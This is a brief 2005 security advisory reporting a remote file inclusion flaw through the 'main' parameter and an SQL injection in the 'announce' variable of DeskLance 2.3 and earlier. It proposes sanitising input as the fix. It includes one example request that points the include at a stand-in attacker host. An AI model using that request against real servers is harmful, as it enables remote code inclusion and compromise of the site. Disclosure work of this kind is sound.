DeskLance Vuln. Vuln. dicovered by : r0t Date: 24 nov. 2005 Orginal advsiory:http://pridels.blogspot.com/2005/11/desklance-vuln.html Vendor:http://www.desklance.com/ affected version: 2.3 and prior
Vuln. description: Input passed to the "main" parameter in "index.php" isn't properly verified, before it is used to include files. This can be exploited to include arbitrary files from external and local resources. example: /support/index.php?main=http://attackerhost/file
aslo "announce" variable isn't properly sanitised before being used in a SQL query.It gives it gives to attacker full path and can be exploited by injecting arbitrary SQL code
Solution: Edit the source code to ensure that input is properly sanitised.